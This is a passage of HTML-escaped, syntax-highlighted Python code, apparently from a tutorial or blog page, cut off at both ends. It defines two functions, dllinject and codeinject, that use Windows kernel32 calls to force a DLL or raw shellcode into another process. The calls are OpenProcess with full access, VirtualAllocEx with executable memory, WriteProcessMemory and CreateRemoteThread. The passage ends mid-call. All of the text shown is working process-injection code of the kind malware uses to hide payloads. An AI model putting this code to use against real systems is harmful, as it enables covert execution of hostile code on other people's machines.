style=&#34;color:#111&#34;&gt;PROCESS_ALL_ACCESS&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;DELETE&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                      &lt;span style=&#34;color:#111&#34;&gt;READ_CONTROL&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                      &lt;span style=&#34;color:#111&#34;&gt;WRITE_DAC&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                      &lt;span style=&#34;color:#111&#34;&gt;WRITE_OWNER&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                      &lt;span style=&#34;color:#111&#34;&gt;SYNCHRONIZE&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                      &lt;span style=&#34;color:#ae81ff&#34;&gt;0xFFF&lt;/span&gt; &lt;span style=&#34;color:#75715e&#34;&gt;# If &amp;lt; WinXP/WinServer2003 - 0xFFFF otherwhise&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                    &lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;VIRTUAL_MEM&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x1000&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;|&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x2000&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;windll&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;kernel32&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#00a8c8&#34;&gt;def&lt;/span&gt; &lt;span style=&#34;color:#75af00&#34;&gt;dllinject&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;dll_path&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;pid&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;):&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;&amp;#34;&amp;#34; Inject a DLL into target process.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    :param dll_path: path to dll&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    :param pid: target process id&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;dll_len&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;dll_path&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;OpenProcess&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;PROCESS_ALL_ACCESS&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;int&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;pid&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;))&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;not&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;:&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#75715e&#34;&gt;# No handler to PID&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#75715e&#34;&gt;# Allocate space and write DLL path into it&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;dll_address&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;VirtualAllocEx&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;dll_len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;VIRTUAL_MEM&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;PAGE_READWRITE&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;w&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;c_int&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;WriteProcessMemory&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;dll_address&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;dll_path&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;dll_len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;byref&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;w&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;))&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#75715e&#34;&gt;# Where is LoadLibraryA?&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;h_kernel32&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;GetModuleHandleA&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;kernel32.dll&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;h_loadlib&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;GetProcAddress&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;h_kernel32&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;LoadLibraryA&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#75715e&#34;&gt;# Create thread&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;t_id&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;c_ulong&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;not&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;CreateRemoteThread&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;None&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_loadlib&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;dll_address&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;byref&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;t_id&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)):&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#75715e&#34;&gt;# Cannot start a thread&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;print&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;t_id&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;True&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#00a8c8&#34;&gt;def&lt;/span&gt; &lt;span style=&#34;color:#75af00&#34;&gt;codeinject&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;shellcode&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;pid&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;):&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;&amp;#34;&amp;#34; Inject code into target process.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    :param shellcode: shellcode to inject&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    :param pid: target process id&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;    &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;shellcode_len&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;shellcode&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;OpenProcess&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;PROCESS_ALL_ACCESS&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;int&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;pid&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;))&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;not&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;:&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#75715e&#34;&gt;# No handler to PID&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#111&#34;&gt;print&lt;/span&gt; &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;No handler to PID&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;shellcode_address&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;VirtualAllocEx&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;shellcode_len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;VIRTUAL_MEM&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;w&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;c_int&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;WriteProcessMemory&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;shellcode_address&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;shellcode&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;shellcode_len&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;byref&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;w&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;))&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#111&#34;&gt;t_id&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;c_ulong&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;not&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;KERNEL32&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;CreateRemoteThread&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;h_process&lt;/span&gt;&lt;span 